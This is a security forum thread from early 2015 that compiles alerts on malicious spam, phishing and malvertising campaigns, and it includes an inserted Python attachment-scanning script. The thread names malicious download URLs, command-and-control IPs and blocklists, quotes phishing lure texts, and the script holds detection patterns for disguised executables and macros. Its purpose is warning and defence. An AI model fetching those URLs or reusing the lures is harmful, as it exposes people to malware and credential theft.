Jan 27, 2015
> https://www.virustotal.com/en/file/23bbf7b1407bb9e657160f0545facc1d2634d5ba55d67bfaef3685194aa66ec1/analysis/1422351532/

216.251.43.17: https://www.virustotal.com/en/ip-address/216.251.43.17/information/

80.150.6.138: https://www.virustotal.com/en/ip-address/80.150.6.138/information/

:fear: :mad:

AplusWebMaster
2015-01-28, 14:24
FYI...

Fake 'invoice' SPAM - doc malware
- http://myonlinesecurity.co.uk/windsor-flowers-invoice-1385-word-doc-malware/
28 Jan 2015 - "'Windsor Flowers Invoice 1385' pretending to come from Windsor Flowers Accounts <windsorflowersaccounts@ hotmail .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has what appears to be a genuine word doc attached which is malformed and contains a macro script virus... The email looks like:
Dear Accounts payable
Please see attached invoice 1385 for flowers within January 15.
Our bank details can be found at the bottom of the invoice.
If paying via transfer please reference our invoice number.
If you have any queries, please do not hesitate to contact me.
Many thanks in advance
Connie
Windsor Flowers
74 Leadenhall Market
London
EC3 V1LT
Tel: 020 7606 4277...

28 January 2015: Windsor Flowers Invoice 1385 Sheet1.doc (2 different versions)
Current Virus total detections: (76kb) 3/57* | (84 kb) 3/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/29e3cf6745741414e3249c10a60f146a0f7dc8776b77fb1c18a8cd71233bdfcf/analysis/1422442083/

** https://www.virustotal.com/en/file/0dc4f465af070ed0e15c1ab5932956fa8542688bb4e0de37b6efdc32b63cf8b1/analysis/1422443094/
___

Fake 'RBS' SPAM - pdf-malware
- http://myonlinesecurity.co.uk/rbs-morning-commentary-fake-pdf-malware-2/
28 Jan 2015 - "'RBS Morning commentary' pretending to come from RBS .COM <no-replay@ rbs .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please refer to the details below if you are having problems reading the attached file.
Please do not contact your Treasury Centre for technical issues – these should be routed to RBS FM support. The attached file is in zip format; first you have to unzip it (self-extracting archive, Adobe PDF) and then it can be viewed in Adobe Acrobat Reader 3.0 or above. If you do not have a copy of the software please contact your technical support department...

All the attachment numbers are random but all extract to same -malware- payload.
28 January 2015: attachment3532715.zip: Extracts to: attachment.exe
Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fdb5ee90aacbac3fcde716adfc837f96d0f12f85d9a5ffd9f60eea6f66376b00/analysis/1422448752/
... Behavioural information
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___

xHamster involved in large Malvertising campaign ...
- https://blog.malwarebytes.org/exploits-2/2015/01/top-adult-site-xhamster-involved-in-large-malvertising-campaign/
Jan 27, 2015 - "... a particularly large malvertising campaign in progress from popular adult site xhamster[.]com, a site that boasts half a billion visits a month. In the past two days we have noted a 1500% increase in infections starting from xHamster. Contrary to the majority of drive-by download attacks which use an exploit kit, this one is very simple and yet effective by embedding landing page and exploit within a rogue ad network... The URL linked to is a simplified landing page hosted by what looks like a rogue ad network. The landing simply consists of preparing for a Flash Player exploit... the Flash exploit itself (0 detection on VT*), again hosted on the same ad network. Depending on your version of Flash you may get the recent 0-day:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/flash-300x262.png
Upon successful exploitation, a malicious payload (Bedep) VT 2/57**, is downloaded from:
hxxp ://nertafopadertam .com/2/showthread.php
What we see post exploitation is ad fraud as described here***... While malvertising on xHamster is nothing new, this particular campaign is extremely active. Given that this adult site generates a lot of traffic, the number of infections is going to be huge."
* https://www.virustotal.com/en/file/b0cb277928be3a1072d6c05c7ab6386f2e0c836d51f71cfefeae8f061bdf1ee8/analysis/1422391909/

** https://www.virustotal.com/en/file/00ce05a515ac0c081636712979b6c04b02b3089cc3e3a2af2554a6ff62330f85/analysis/1422393597/

*** https://blog.malwarebytes.org/exploits-2/2015/01/new-adobe-flash-zero-day-found-in-the-wild/

:fear: :mad:

AplusWebMaster
2015-01-29, 15:56
FYI...

Fake 'Invoice' SPAM - doc malware
- http://myonlinesecurity.co.uk/invoice-10413-spotless-cleaning-word-doc-malware/
29 Jan 2015 - "'Invoice #10413 from SPOTLESS CLEANING' pretending to come from paulamatos@ btinternet .com with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This message contains Invoice #10413 from SPOTLESS CLEANING. If you have questions about the contents of this message or Invoice, please contact SPOTLESS CLEANING.
SPOTLESS CLEANING
GLYNDEL HOUSE
BOWER LANE
DA4 0AJ
07956 379907

29 January 2015 : SPOTLESS CLEANING-Invoice-10413.doc - Current Virus total detections: 0/57*
... this malicious word doc with macros downloads from www .otmoorelectrical .co.uk/js/bin.exe which is saved as %temp%\hDnyDA.exe (dridex banking Trojan) which has a current detection rate of 2/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f1b3df8dde1b7336810c70898546b76afe5b2ba4af247ce33f6296ca06db45e0/analysis/1422523082/

** https://www.virustotal.com/en/file/6f738e8f6cd3a6abba6168a0046288690f4ee6aa778fbe202a3eac458168ceea/analysis/1422531540/
___

Fake 'BACS Transfer' SPAM - doc malware
- http://myonlinesecurity.co.uk/garth-hutchison-bacs-transfer-remittance-jsag400gbp-word-doc-malware/
29 Jan 2015 - "'Garth Hutchison BACS Transfer : Remittance for JSAG400GBP' pretending to come from Garth Hutchison <accmng2556@ blumenthal .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.

29 January 2015 : BACS_transfer_JS87123781237.doc - Current Virus total detections: 0/57*
... same malware payload as today’s Invoice #10413 from SPOTLESS CLEANING – Word doc malware** ..."
* https://www.virustotal.com/en/file/f1b3df8dde1b7336810c70898546b76afe5b2ba4af247ce33f6296ca06db45e0/analysis/1422524523/

** http://myonlinesecurity.co.uk/invoice-10413-spotless-cleaning-word-doc-malware/
___

Swiss users inundated with malware-laden SPAM
- http://net-security.org/malware_news.php?id=2950
29.01.2015 - "Swiss users are being heavily targeted by a number of spam campaigns delivering the Tiny Banker (TinBa or Busy) e-banking Trojan. Starting with Tuesday, the spammy emails seem to come from email addresses opened with big Swiss free email service providers (bluewin .ch, gmx .ch) and Swiss telecom provider Orange (orange .ch), but actually originate from broadband lines located all over the world. They masquerade as emails containing images sent from iPhones, an MMS sent to the user by Orange, and an application for a job position:
> http://www.net-security.org/images/articles/swiss-spam-29012015.jpg
Unfortunately for those who fall for these tricks, the attached ZIP files contain only malware. "While most of the Tinba versions I usually come across are utilising a Domain Generation Algorithm (DGA) to calculate the current botnet C&C domain, the version of Tinba that has been spread in Switzerland since yesterday is using hard-coded botnet C&C domains," noted Swiss security activist Raymond Hussy*. Further investigation revealed that all the sending IP addresses are Cutwail-infected IPs, and the malware tries to contact four distinct C&C servers, two of which have already been sinkholed. Hussy recommends that network administrators block traffic to and from the remaining two active domains (serfanteg .ru, midnightadvantage .ru) and the following IPs: 91.220.131.216 and 91.220.131.61. "In general, 91.220.131.0/24 looks quite suspect. So you may want to block the whole netblock," he pointed out, adding that it would also be a good idea to block filenames with multiple file extensions on their email gateway."
* https://www.abuse.ch/?p=9095

91.220.131.61: https://www.virustotal.com/en/ip-address/91.220.131.61/information/

91.220.131.216: https://www.virustotal.com/en/ip-address/91.220.131.216/information/

:fear: :mad:
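A gateway-side triage routine for the attachment patterns this thread keeps reporting (an executable inside a zip, a decoy extension hidden in front of .scr or .exe, a stem that reads like a PDF or invoice, and a Word or Excel file carrying a VBA project, as in the TAX_ and invoice documents above), written here as an added example and not taken from any of the quoted blogs. The sample attachments are constructed in memory, and the macro check is a byte-marker heuristic rather than a full OLE parse.

```python
import io
import os
import re
import zipfile
from typing import List

# Extensions Windows executes on double-click; a spoofed PDF icon hides these
# when "show known file extensions" is off.
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
            ".js", ".jse", ".vbs", ".vbe", ".wsf"}
# Tokens spammers put in the stem so the name reads like a document or media file,
# e.g. "bankline_document_pdf34929.exe" or "doc-PDF.exe".
LURE_TOKENS = re.compile(r"pdf|doc|xls|wav|jpg|png|invoice|statement|document|fax", re.I)
# Binary Office (OLE) files start with this magic and store the macro stream name as UTF-16LE.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
OLE_VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")


def check_filename(name: str) -> List[str]:
    """Reasons to hold an attachment based on its name alone; [] means the name is clean."""
    reasons = []
    base = os.path.basename(name.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    if ext.lower() in EXEC_EXT:
        reasons.append(f"executable extension {ext.lower()}")
        # "VOICE 837-676-8958.wav.scr": a decoy extension sits in front of the real one
        if os.path.splitext(stem)[1]:
            reasons.append("multiple extensions")
        if LURE_TOKENS.search(stem):
            reasons.append("document-lookalike name")
    return reasons


def check_attachment(name: str, data: bytes) -> List[str]:
    """Name plus content checks: zips are opened, Office files are checked for VBA."""
    reasons = check_filename(name)
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            members = zf.namelist()
            # OOXML (.docx/.xlsx) is itself a zip; vbaProject.bin means macros are present
            if any(m.lower().endswith("vbaproject.bin") for m in members):
                reasons.append("OOXML document carries a VBA project")
            for member in members:
                for r in check_filename(member):
                    reasons.append(f"zip member {member}: {r}")
                # a PE image renamed to a harmless extension still starts with "MZ"
                if (zf.read(member)[:2] == b"MZ"
                        and os.path.splitext(member)[1].lower() not in EXEC_EXT):
                    reasons.append(f"zip member {member}: PE header under a non-executable name")
    elif data.startswith(OLE_MAGIC) and OLE_VBA_MARKER in data:
        reasons.append("OLE document carries a VBA project")
    return reasons


def build_zip(member: str, payload: bytes) -> bytes:
    """Constructed fixture: a one-member zip like the attachments quoted in this thread."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, payload)
    return buf.getvalue()


# Constructed stand-ins: a 64-byte "MZ" stub and a fake OLE header plus marker, not real malware.
FAKE_PE = b"MZ" + b"\x00" * 62
FAKE_MACRO_DOC = OLE_MAGIC + b"\x00" * 24 + OLE_VBA_MARKER + b"\x00" * 24

if __name__ == "__main__":
    samples = {
        "VOICE837-676-8958.zip": build_zip("VOICE 837-676-8958.wav.scr", FAKE_PE),
        "bankline_document_pdf57331.zip": build_zip("bankline_document_pdf34929.exe", FAKE_PE),
        "TAX_42592OE.doc": FAKE_MACRO_DOC,
        "Invoice_1385.pdf": b"%PDF-1.4\n",
    }
    for filename, content in samples.items():
        verdict = check_attachment(filename, content)
        print(f"{filename}: {'HOLD ' + '; '.join(verdict) if verdict else 'pass'}")
```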

AplusWebMaster
2015-01-30, 14:59
FYI...

Fake 'BACS Transfer' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-bacs-transfer-remittance.html
30 Jan 2015 - "So far I have only seen one sample of this..
From "Garth Hutchison"
Date 21/01/2015 11:50
Subject BACS Transfer : Remittance for JSAG400GBP
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.

Attached is a malicious Word document BACS_transfer_JS87123781237.doc [VT 1/57*] which contains a macro... which downloads a file from:
http ://stylishseychelles .com/js/bin.exe
This is then saved as %TEMP%\iHGdsf.exe. This has a VirusTotal detection rate of 6/57** identifying it as a Dridex download... Sources indicate that this malware phones home to the following IPs which I recommend you block:
92.63.88.108
143.107.17.183
5.39.99.18
136.243.237.218 "
* https://www.virustotal.com/en/file/901652283bd26716f3d5d2d6f4d032e0d942302877c51529e101a5a53c631de7/analysis/1422618493/

** https://www.virustotal.com/en/file/32b8d7069dae180e0f2666301384411243256d9abc681f897eb67bf0fd6e6406/analysis/1422618468/
___

Fake BBB SPAM - PDF malware
- http://myonlinesecurity.co.uk/bbb-sbq-form-2508ref61-959-0-4-fake-pdf-malware/
30 Jan 2015 - "'BBB SBQ Form #2508(Ref#61-959-0-4)' pretending to come from Admin <no-replay@ bbbl .org> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/BBB.png

30 January 2015: SBQForm-57675.zip ( 13kb) : Extracts to: doc-PDF.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/027d6621ed2c127a311006f17edeacabaf6dd2abefa3d1078e6e140403192a1f/analysis/1422628270/
... Behavioural information
TCP connections
46.165.223.77: https://www.virustotal.com/en/ip-address/46.165.223.77/information/
31.170.162.203: https://www.virustotal.com/en/ip-address/31.170.162.203/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
208.91.197.54: https://www.virustotal.com/en/ip-address/208.91.197.54/information/
208.97.25.20: https://www.virustotal.com/en/ip-address/208.97.25.20/information/
___

Fake 'RE-CONFIRM' SPAM - malware
- http://myonlinesecurity.co.uk/re-confirm-p-oxx1ll112-malware/
30 Jan 2015 - "'RE-CONFIRM P.O©{XX1ll112}' pretending to come from sensaire@ emirates .net .ae with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/RE-CONFIRM-P.O%C2%A9XX1ll112.png

30 January 2015: Purchase order(1).zip: Extracts to: Purchase order.exe
Current Virus total detections: 12/57*. This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper file with an icon saying A instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8e60c22f0f013b03db8f65d29b2321f74bdf9300fbadcbf3f730556ad95c6255/analysis/1422633004/
___

Fake 'Apple Termination' – Phish ...
- http://myonlinesecurity.co.uk/apple-termination-phishing/
30 Jan 2015 - "'Apple Termination' pretending to come from Apple Account <support@ apple-messages .com> is one of the latest -phish- attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Apple-Termination.png

If you follow the link you see a webpage looking like this, with a pre-filled box containing your email address:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID.png
When you fill in your user name and password you get a page looking like this (split into sections), where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID_3.png
... these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___

Fake 'Tesco Bank' – Phish ...
- http://myonlinesecurity.co.uk/latest-estatement-ready-tesco-bank-phishing/
30 Jan 2015 - "'Latest estatement is ready – Tesco Bank' pretending to come from savings@ tescobank .com <pol@ tesco .com> is one of the latest -phish- attempts to steal your Tesco bank Account and your other personal details. This one only wants your personal details, Tesco log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... a website that looks at first glance like the genuine Tesco bank website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you to fill in the html (webpage) form that comes attached to the email.
Certain restriction has been placed on your tesco bank online services
View your eDocument attached to proceed
Tesco Bank is a retail bank in the United Kingdom which was formed in 1997,
and which has been wholly owned by Tesco PLC since 2008
©Tesco Personal Finance plc 2014 / ©Tesco Personal Finance Compare Limited 2014.

If you open the attached html form you see this message:
Your Latest Tesco Bank Saving Account Statement is ready.
Certain restriction has been placed on your tesco bank online service
You would be required to re – activate your online banking access to proceed
Activate Your Online Access

If you follow that link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

:fear::fear: :mad:

AplusWebMaster
2015-01-31, 19:51
FYI...

Super Bowl Phishing -and- SPAM ...
- https://isc.sans.edu/diary.html?storyid=19261
2015-01-31 - "Beware of Super Bowl spam that may come to your email inbox this weekend. The big game is Sunday and the spam and phishing emails are -pouring- in complete with helpful -links- back-ended by malware and/or credential harvesting:
> https://isc.sans.edu/diaryimages/images/superbowl.PNG
... worth a reminder to friends and family if they see any emails about the Super Bowl that appears to be too-good-to-be-true - delete it..."

:fear::fear:

AplusWebMaster
2015-02-02, 19:30
FYI...

Fake 'Facebook Account' SPAM - PDF malware
- http://myonlinesecurity.co.uk/facebook-account-suspended-fake-pdf-malware/
2 Feb 2015 - "'Facebook Account Suspended' pretending to come from Facebook <noreply@ mail .fb .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and follow the link and run the downloaded file... Google seems to be -ignoring- the report to take down this url so far today or are far too busy complaining about Microsoft and other program makers not issuing patches inside the 90 day time period that Google insist on, to do something really useful in actually protecting users from malware like this one... The email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/facebook-account-suspended.png

2 February 2015: TermsPolicies.pdf.exe - Current Virus total detections: 11/57*
This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9af89f66fb76b016dcf0ab984c35b3948f0f04e828509c083637a8498d3e81dc/analysis/1422881129/
___

Fake 'Your Apple ID' - Phish ...
- http://myonlinesecurity.co.uk/apple-idwas-used-restore-device-one-icloud-backups-phishing/
2 Feb 2015 - "'Your Apple ID,was used to restore a device from one of your iCloud backups' pretending to come from Apple iTunes <orders@ tunes .co .uk> is one of the latest phish attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... The original email looks like this. It will NEVER be a genuine email from Apple or any other company so don’t ever click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine Apple website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you to fill in the html (webpage) form that comes attached to the email. This one has a short url link ( https ://tr .im/JxUNR) in the email which -redirects- you... When you fill in your user name and password you get a page looking very similar to this one (split into sections), where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
(Screenshots available at the myonlinesecurity URL at the top of this post.)
___

Facebook porn video trojan affects 110K users in 2 days
- http://www.theinquirer.net/inquirer/news/2393198/facebook-porn-video-trojan-affects-110-000-users-in-two-days
Feb 02 2015 - "A TROJAN that has spread itself by posting links to a pornographic video has affected over 110,000 Facebook users in just 48 hours. The malware spreads from the account of previously infected users of the social network, tagging around 20 of their friends. If someone opens the link contained in the post, they will get a preview of a porn video which eventually stops and asks for a fake Flash player to be downloaded which contains the malware. The malware was uncovered by a security researcher called Mohammad Reza Faghan, who posted information about it on security mailing list archive Seclists.org*... the Trojan is different from previous examples seen on Facebook, which sent messages on behalf of the victim to a number of the victim's friends. Upon infection of those friends, the malware could go one step further and infect the friends of the initial friends. In the new technique, however, the malware has more visibility to the potential victims as it tags the friends of the victim in the malicious post. The malware is thought to be able to hijack keyboard and mouse movements if executed successfully once landing on a victim's machine."
* http://seclists.org/fulldisclosure/2015/Jan/131
___

Fake Chrome update Spam drops CTB Locker/Critroni Ransomware
- https://blog.malwarebytes.org/social-engineering/2015/02/google-chrome-update-spam-drops-ctb-lockercritroni-ransomware/
Feb 2, 2015 - "Beware of emails appearing to come from Google warning you that “Your version of Google Chrome is potentially vulnerable and out of date”. In this latest spam wave, cyber crooks are tricking users into downloading the well-known browser, except that it’s a dangerous Trojan that will encrypt your personal files and demand a hefty ransom to decrypt them back:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/spam.png
The payload is not attached to the email but instead gets downloaded from various websites that appear to have been compromised... Running “ChromeSetup.exe” will not install Google Chrome. Instead the Windows wallpaper will change to this:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted1.png
This is not just a fake warning. The files on the systems are -indeed- encrypted:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted4.png
The bad guys demand a ransom that can be paid using Bitcoins:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted8.png
... The problem with ransomware is that while the active Trojans can be removed, it is much more difficult and sometimes impossible to recover the encrypted files. The folks at BleepingComputer* have some tips on how to restore your encrypted files. However, as is often the case, prevention is critical to avoid a nasty ransomware infection..."
* http://www.bleepingcomputer.com/virus-removal/ctb-locker-ransomware-information#shadow

- http://net-security.org/malware_news.php?id=2952
03.02.2015
> http://www.net-security.org/images/articles/chrome-mal-03022015.jpg

:fear::fear: :mad:

AplusWebMaster
2015-02-03, 14:46
FYI...

Fake 'CIT' SPAM – doc malware
- http://myonlinesecurity.co.uk/cit-inv-15000375-po-sp14161-word-doc-malware/
3 Feb 2015 - "'CIT Inv# 15000375 for PO# SP14161' pretending to come from Circor <_CIG-EDI@ CIRCOR .COM> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/CIT-Inv-15000375-for-PO-SP14161.png

3 February 2015: FOPRT01.DOC - Current Virus total detections: 1/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/476eaa256c7a17e93e18312bc00049f9a838097bbdab8b8a56d581e3948dca23/analysis/1422951071/

- http://blog.dynamoo.com/2015/02/malware-spam-circor-cig-edicircorcom.html
3 Feb 2015
"... Recommended blocklist:
143.107.17.183
92.63.88.108 "
___

Fake 'Barclays Your Debit Card' – Phish ...
- http://myonlinesecurity.co.uk/barclays-debit-card-notification-phishing/
3 Feb 2015 - "'Your Debit Card Notification' pretending to come from Barclays Bank Plc is one of the latest phish attempts to steal your Barclays Bank, debit card and personal details. This one only wants your Barclays log in details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... The website at gardendecore .pl has cleaned up the phishing pages and hopefully plugged the security holes or vulnerabilities that let the bad guys get in in the first place. If you follow the link you see a webpage looking like the genuine Barclays log in page:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish_-feb_2015.png

When you fill in the required details there, the phishers then send you on to the next page where they ask you to fill in your name, details and passcodes; the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___

Fake 'Garrett' SPAM - malware
- http://myonlinesecurity.co.uk/pulsar-instruments-plc-garrett-courtright-copy-07441489933-malware/
3 Feb 2015 - "'Garrett Courtright Copy from +07441489933' pretending to come from Garrett Courtright <ophidian@ nagsgolf .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Fax: +07441489933
Date: 2015/01/18 16:43:04 CST
Pages: 1
Reference number: Y67969682C281D
Filename: pulsar_instruments_plc57.zip
Pulsar Instruments Plc
Garrett Courtright

3 February 2015: pulsar_instruments_plc57.zip: Extracts to: pulsar_instruments_plc57.scr
Current Virus total detections: 7/56*. This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c02902664a73255408adc93bb1b0b8075759eacbf16dbb9a88c96343f46818b3/analysis/1422985036/
... Behavioural information
TCP connections
213.186.33.2: https://www.virustotal.com/en/ip-address/213.186.33.2/information/
5.178.43.10: https://www.virustotal.com/en/ip-address/5.178.43.10/information/
___

Fake 'Halifax' SPAM – Phish ...
- http://myonlinesecurity.co.uk/update-account-details-halifax-phishing/
3 Feb 2015 - "'Update your account details' pretending to come from Halifax Online Banking <securitynews@halifax.co.uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. An alternative email says 'We’re improving your Halifax account' also pretending to come from Halifax Online Banking <securitynews@ halifax .co .uk>. This one wants all your personal details including email address and password and your credit card and bank details. Many of them are also designed to specifically steal your facebook and other social network log in details as well... don’t -ever- open or fill in the html (webpage) form that comes attached to the email... If you do it will lead you to a website that looks at first glance like the genuine bank website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you to follow a link in the body of the email to a phishing site. Both of today’s emails have different phish sites in the attached html files but otherwise the attachments are identical.

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/halifax_phish_email_2.png
-or-
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/halifax_phish_email_1.png

If you open the attached html file you see a webpage looking like this (split in 2 to get it all):
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/halifax1-1024x587.png

> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/halifax21-1024x620.png

... these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

:fear: :mad:

AplusWebMaster
2015-02-04, 19:27
FYI...

Fake 'USPS Delivery' SPAM – doc malware
- http://myonlinesecurity.co.uk/usps-delivery-notification-word-doc-malware/
4 Feb 2015 - "'USPS Delivery Notification' pretending to come from USPS <no-reply@ usps .gov> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/USPS-Delivery-Notification-1024x614.png

4 February 2015: label_54633541.doc - Current Virus total detections: 2/55*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/5ac0c18b4743626c3c49492cd7470c1b4060c553705bb49612a5d1b2be0c2fb5/analysis/1423064590/
___

Pawn Storm Update: -iOS- Espionage App Found
- http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/
Feb 4, 2015 - "... spyware specifically designed for espionage on -iOS- devices. While spyware targeting -Apple- users is highly notable by itself, this particular spyware is also involved in a targeted attack... Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities, like the military, governments, defense industries, and the media. The actors of Pawn Storm tend to first move a lot of pawns in the hopes they come close to their actual, high profile targets. When they finally successfully infect a high profile target, they might decide to move their next pawn forward: advanced espionage malware... The iOS malware we found is among those advanced malware. We believe the iOS malware gets installed on already compromised systems, and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems... The obvious goal of the SEDNIT-related spyware is to steal personal data, record audio, make screenshots, and send them to a remote command-and-control (C&C) server. As of this publishing, the C&C server contacted by the iOS malware is -live- ...
C&C Communication: Besides collecting information from the iOS device, the app sends the information out via HTTP. It uses POST requests to send messages, and GET requests to receive commands... The exact methods of installing this malware are unknown. However, we do know that the iOS device doesn’t have to be jailbroken per se. We have seen one instance wherein a lure involving XAgent simply says “Tap Here to Install the Application.” The app uses Apple’s ad hoc provisioning, which is a standard distribution method of Apple for iOS App developers. Through ad hoc provisioning, the malware can be installed simply by clicking-on-a-link, such as in the picture below:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/pwnstrm10.png
There may be other methods of infection that are used to install this particular malware. One possible scenario is infecting an iPhone* after connecting it to a compromised -or- infected Windows laptop via a USB cable...
* http://blog.trendmicro.com/trendlabs-security-intelligence/the-other-side-of-masque-attacks-data-encryption-not-found-in-ios-apps/
The hashes of the related files are:
05298a48e4ca6d9778b32259c8ae74527be33815
